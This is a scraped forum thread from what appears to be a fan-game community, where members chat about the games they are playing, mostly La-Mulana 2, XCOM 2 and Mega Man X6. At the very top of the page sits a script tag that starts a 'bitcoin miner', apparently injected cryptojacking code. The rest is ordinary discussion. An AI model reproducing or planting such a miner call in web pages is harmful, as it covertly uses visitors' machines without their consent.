<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmbx communitypge project

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Ashan
The world has become a place
First name: Hayden

Re: What games are you playing?

Postby Ashan » 2 months ago

BurntTenda
defeat four ducks
Pronouns: he/him/his

Postby BurntTenda » 2 months ago

That's a very nice way the ice decided to fall there.
Something goes here sometime.

Bean

Postby Bean » 2 months ago

Since Ashan's doing this one, I decided to join in on the fun. Got myself trapped by going the wrong way in Shark boy's stage, but there were a couple of good moments.

Ashan

Play testing is like... Expensive and time consuming.

Don't have to fix bugs if you never find out about them!

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 2 months ago

Gone back to Xcom 2 with a fresh set of mods and a sense of optimism I'm expecting to be crushed shortly :lol:

Also playing Sekigahara, the board game, against a friend via https://www.yucata.de/en
BOB is an acronym for BOB is Only BOB etc.

Parama

Postby Parama » 2 months ago

again reaching a point in la-mulana 2 where i feel like i really have a lot of stuff locked off by one item in particular and i don't even have a clue where this one is, great :lol:

but there's like, a sequence of three items i know where they are that i can all get right after i get this particular item
and it'll blow the game wide open for me again

curse you,

mysterious vase or whatever

If I was suffering, I’d cut the ties that were never meant to bind.

Celeste Golden Strawberry Challenge (Spoilers):

HatKid
Pronouns: she/her

Postby HatKid » 2 months ago

Reached Tokyo Destiny Land in Shin Megami Tensei. I don't have much of the game left but I have enjoyed the ride so far. I am Law-aligned.

Alice
💙
Pronouns: Girl person

Postby Alice » 2 months ago

Parama wrote: again reaching a point in la-mulana 2 where i feel like i really have a lot of stuff locked off by one item in particular and i don't even have a clue where this one is, great :lol:

but there's like, a sequence of three items i know where they are that i can all get right after i get this particular item
and it'll blow the game wide open for me again

curse you,

mysterious vase or whatever

Honestly that's been how most of the game has felt to me so far, lol. My typical method of progression is make a little progress, get stuck for awhile and go back to every single field looking for anything I've missed, after multiple passes finally find one thing I overlooked, make a little bit of progress (all too often it's usually progress in one area which ends up leading to just a dead end), and then repeat the whole process. Like the

Djed Pillar

. I knew I needed it to progress, finally got it and started following the hints regarding places I knew I could use it, and those places basically turned out totally useless to me.

It's actually annoyed me to the point where I started doing this to keep track of everything:
This is more than just the tablets it currently shows. It also includes npcs and shops too. (Though at the moment the only field I've completed is Yggdrasil.) I'm also using it for the Dark Lord's footprints puzzle as well as interesting stuff like my diagram of the way the

Corridor of Blood

works.

Parama

Yeah I figured out the

corridor of blood

a while back and made a map but I already have it memorized anyways, haha

There's a few places with puzzles I feel like I should be able to solve but haven't yet, I need one specific item still to (I think?) activate the next boss ankh and it's the one locked behind several other items i all know how to get and know where they all are :lol:

There's also two minibosses I have access too but don't think I have the tools to defeat (one I know for sure I don't, because I know what I need, the other I'm not sure though

I've only looked up one thing so far and only becsuse I was completely stuck from making any more progress anywhere by it, don't really feel too bad about it either because it was kind of jank

S.N.N.

Postby S.N.N. » 2 months ago

I'm also on the La-Mulana 2 train, having played 1 almost a decade ago. It's quite the step up, but still retains some of that bullshit "charm" that the first game had - namely, the instant death traps everywhere. Spoiler of where I am so far:

Just got the Egg of Creation in the Takamagahara Shrine after killing my third guardian, and I'm pretty much lost at this point. I started rotating the Corridor of Blood and found like 3 areas that I didn't even know existed, so I guess I'll check them out. I've also solved the puzzle to unlock the Chain Whip, but there's a block in the way of it that I have no idea how to get past (looks like you need to get some sort of ability that shrinks you..?)

I also agree with the previous posts about Icefire Treetops being literal ass.

Parama

i feel like i'm again on the cusp of blowing the game wide open but at the very least i've

been dicking around the underworld for a while & making a lot of progress there, though i have yet to find the "first" gate somehow, despite knowing where pretty much all the rest are. if i can find the vase of storms or whatever i have a sequence of 3 items i can go right to getting as a result (pretty sure i know where they all are & 100% know what they all are) but that's the roadblock isn't it. i have the spike ball whip & all the sub-weapons now, though (and all the main weapons barring maybe one more whip upgrade? not sure)

i have a billion notes to go through now, though. need to find what i'm really looking for

Zummorr
Bug Catcher

Postby Zummorr » 2 months ago

I just finished Metal Gear Rising Revengeance.
Oh my goodness. What a ride.

Like it's the most awesome, stupid, brilliant, thing I've experienced recently.
I'm astounded that the game came out in February 2013 and yet touches so much on topics relevant in 2018 haha.

It's definitely the best Metal-Gear.

KTB
Would you kindly bring us the girl and wipe away the debt?
First name: Theodore
Pronouns: he/him/his

Postby KTB » 2 months ago

As I mentioned in another thread, BioShock Infinite. I'm definitely super late to that party, primarily because around the time it came out I more or less had a somewhat negative impression of FPS's in general, but these games alone very quickly turned that around for me. Extremely fun game, on top of the fact that it has a surprisingly fascinating plot. I finished episode 1 of the DLC but the ending of that was such a mindscrew for me that I'm taking a brief break before finally finishing the series as a whole with episode 2.

Other than that, I'm also loving La-Mulana 2 (because I just can't stay away from whatever's trending at the moment). I don't have much to say other than that this game is every bit as awesome as the first one, and that includes the soundtrack, of course. I can't believe I'm saying this but I actually kind of look forward to the Deceased Crab LP of this just for old time's sake.

Bean

In a brief moment of having time to play something other than Fire Emblem Heroes, my bro and I got in an hour of Go Vacation on the Switch yesterday. It's kind of funny that the island has the name Wii in it since it was on that system originally. Didn't play it back then, but it was kind of fun for what events we did like Snow Tube Bowling.

Ashan

Welp, finished off X6. As expected it wasn't very good. The music is almost completely non-memorable and bland, the levels are all just like flat "run forward and kill the same enemies over and over again," the bosses seem to all be easiest if you just spam charge shots or the Z-saber on them, there's typos all over, the story makes no sense, the cutscenes are too long, the nightmare gimmick is not a fun challenge -- it's just huge inconveniences, and their idea of challenging sections are just spamming enemies in super inconvenient places (looking at you, totem pole section with annoying vertical moving hover platforms).
Infinity Majinion is the spammiest, most trash boss of possibly any Mega Man game I've played. Both fights with him I basically just stood inside the big mess of blobs and clones and out DPSed him.
And Blaze Heatnix's stage is probably the worst Mega Man stage in any game I've played. It's literally just spamming the same lazy, uninteresting mini boss over and over again. Who thought that would be fun?

They also hid the armor capsules way too well, and it seems as if you literally need the Shadow armor to beat the game or the first post-game stage you just can't get through. And it ends up putting you in a boss fight that's incredibly inconvenient to fight with the required armor. And even after getting all the armor pieces, I didn't end up wanting to use anything other than the Falcon armor (aka the STARTING ARMOR) because it had the best charge shot.

Also can i say the double-tap a direction to dash is a huge mistake? At least when you're in the air. I don't think this was just in X6 but I really noticed it getting annoying in this game. There is literally never a time where I wanted to air dash by double-tapping the direction buttons. But it kept accidentally triggering because I'm trying to precisely place myself mid-air so I double tap a direction and suddenly X flies off to the side and off a cliff or into an enemy. I looked in the settings for a way to turn this off and there didn't seem to be anything. It made me very angry on pretty much every play session.

Bean

They didn't give you an option to disable the Command Dash/Double Tap Dash option until Zero 4 for games that have that feature. I didn't know it happens on the air dash in that one though. Yikes.

Ashan

Oh is THAT why it was only a noticeable issue in X6? Cause I don't remember ever accidentally triggering the air dash in X4 or X5 but I figured maybe there just wasn't as many situations where it mattered. But that would make sense if X6 is the only one where you can double tap in the air to air dash.
Yeah, it's a horrible feature. It totally goes again the ability to precisely move yourself in midair. I was constantly air dashing into bosses when I'd jump towards them and try to position myself to hit them with the Z-saber.

Parama

Postby Parama » 1 month ago

i am now playing guacamelee 2

turns out it's good

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 1 month ago

Finished XCOM2 on Standard - not gonna go back to it for Classic until I pick up War of the Chosen, which may not be for a while. It's good, it's just not quite as good as XCOM: EU or EW.

I started and very rapidly finished Ironclad Tactics! But it turns out the DLC is included for free now, so I'm doing the additional campaigns. Not sure I'll bother going too deep into NG+, it seems staggeringly hard and more chance-based than I'd like.

I'm thinking of playing though The Darkness and The Darkness II back-to-back after that as part of my long-standing console backlog.

Bean

Postby Bean » 1 month ago

Sonic Mania Plus. Been playing Encore Mode which switches up the locations of the Special Stage rings, adds more enemies, and loses the lives system for having a set of five characters that you can flip between either manually or with item boxes. Believe you get a game over if you lose all the characters, but I wouldn't know right now. Got through the first three zones without losing anyone so far.

Whimsical Calamari
i am the one that sings the chorus when you hum in the shower

Postby Whimsical Calamari » 1 month ago

Bean wrote: Encore Mode
ah dang it that was part of the reason i got Plus (and a Switch at all) and i still haven't touched it. worth it for Ray tho

also Kirby Star Allies' Soul Melter Arena is killing me slowly

Alice
💙

Postby Alice » 1 month ago

Alice wrote: I honestly prefer Hell Temple to Icefire Treetops. At least I'm to the point where the stupid poison lava isn't quite instant death. Though with everything in the lower part being seemingly designed to get you knocked into the lava, that kinda quickly adds up.
I take this back. Early game Icefire Treetop is relaxing compared to the

Eternal Prison

. That place is an utter nightmare to navigate. I'm kinda impressed they managed to include not just one but two entire areas that are worse than Hell Temple.

I'm kinda stuck at the moment though. I can do some stuff in the aforementioned area still but most of it requires a key fairy. I don't have the software to guarantee a given fairy and while someone has explained how the fairies work in this one, I still get healing fairies far too often. (It'll net me either the bombs or another mantra I think but I'm not actually certain which since both seem to be on the same screen.)

The other place I can do stuff is the Hall of Malice but I'm too annoyed by where I'm stuck there. Phaia is an utter garbage boss. No matter what I do I come out with less than 50hp left after that fight and usually take so many hits that my revive software combo kicks in. I've done everything else in the area though that I can currently reach. I know I can buy the

Angel Shield

once I beat this set of bosses though. I forgot about the shop on that side of the field until after I'd already activated the field and that blocks off the Corridor of Blood entrance infuriatingly enough.

I'm just hoping the guardian of this field doesn't end up as bullshit as the field itself.

The stuff I've read so far makes it pretty clear it's going to be styled after Tiamat in the first game who was one of my favorite guardians there but was still the hardest. But this game tends to be such an insufferable asshole to the player that I actually dread how much worse Echidna's going to be. Hopefully it'll be a difficult but fun fight like Tiamat and most of the other guardians, sans Jormungandr, instead of what I fear will be the case.

After that I just have

Surtr (who I still need to figure out where to get the light scythe for, I know it's Eternal Prison but I have no idea where yet)

and then whatever the final guardian will be.

I'm assuming that one will probably be in the Eternal Prison but I'm not actually certain.

Parama

Postby Parama » 1 month ago

Echidna is... weird but not that bad with subweapons. Surtr can eat two and a half dicks.

Also regarding the riddles (if you've found them):

I don't know if this was fixed yet but there was a mistranslation on one of them that made the riddle almost impossible to figure out, the one about "incanted silence" should also be mentioning a wheel

agree that the

eternal prison

is a pain to navigate but I mean

it's literally hell, so

I finished a few weeks back btw :V like the game more than the first overall but it still has issues

Right now been playing The King's Bird, cool and fluid precision platformer, a lot of influence from dustforce especially

Alice
💙

Postby Alice » 1 month ago

Parama wrote: Also regarding the riddles (if you've found them):

I don't know if this was fixed yet but there was a mistranslation on one of them that made the riddle almost impossible to figure out, the one about "incanted silence" should also be mentioning a wheel

I did find them, though I've yet to figure them out. Mulbruk was fairly helpful in at least specifying they're all in Hell though. The first one had me thinking they could be anywhere since I hadn't seen any ice in the Underworld. Though I do have two ideas. Styx is icy water and the room two to the right is, I believe, Sakit's grave which would give that room a tenuous connection to ice.

As for the third riddle, I'd actually read it hasn't been fixed yet, though I avoided spoilers on actually solving the riddles. So it mentioning a wheel may help out without spoiling everything. I just wonder if I have the right idea on what it means for "incanting silence". I was thinking thse using the Djed Pillar without any mantras might count but I'm uncertain. Mentioning a wheel gives me an idea where to try as well. There's the Yuga Ring just inside the entrance, a room to the right of Hraesvelgr.

My last play session was actually a fair bit surprising. Normally anymore I end my play sessions feeling exhausted and frustrated. This time, despite spending about 90% of my time in either

the activated Hall of Malice and the Underworld

I actually ended off my session feeling pretty alright for once. Also since that last post I did complete the Hall of Malice but

I still need to buy the angel shield because I spaced it in my rush to heal and save after Phaia and Viy Jr. as well as actually fight Echidna which I only realized I can fight after I'd quit for the night. There's a tablet somewhere in the Hall of Malice that talks about creaming to make your wishes be heard which I'd misinterpreted, according to Komus, and lead me to believe that that's how I'd make Echidna's ankh appear but beating Orthrus, which I did, accomplishes that task.

And if I can complete those riddles then I should be able to finish up one more guardian leaving me with just some loose ends to tie up in the main ruins (obtaining Miracle Witch, for example. I know its approximate location but don't yet know exactly how to actually get it just yet. After that is just the music expansion for software) and then focusing on the final guardian.

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 1 month ago

BobisOnlyBob wrote: I'm thinking of playing though The Darkness and The Darkness II back-to-back after that as part of my long-standing console backlog.
I did this! They were surprisingly good! Neither were fantastic, but they're memorable and oddball little console shooters.

Then I knocked off The Magic Circle, Aaero, and Killing Time at Lightspeed. I'm using HowLongToBeat to work through my backlog from shortest to longer games!

The Magic Circle actually really sucked me in. I ended up 100%ing it on a second pass around, clocking in at 10 hours instead of the 4-5 I expected. Gave me plenty to think about in game design, beyond just laughing at the Richard Garriott pastiche.

Aaero is not Rez, but it's trying. Beat it on normal, shove it onto the "replayable" pile for a rainy day.

Killing Time at Lightspeed is basically a visual novel, except it's almost text-only and done in the style of two separate Facebook and reddit feeds. Every time you reload the page, a year passes on earth. Clever stuff, but familiar territory for my tastes.

Return to “the cartridgé”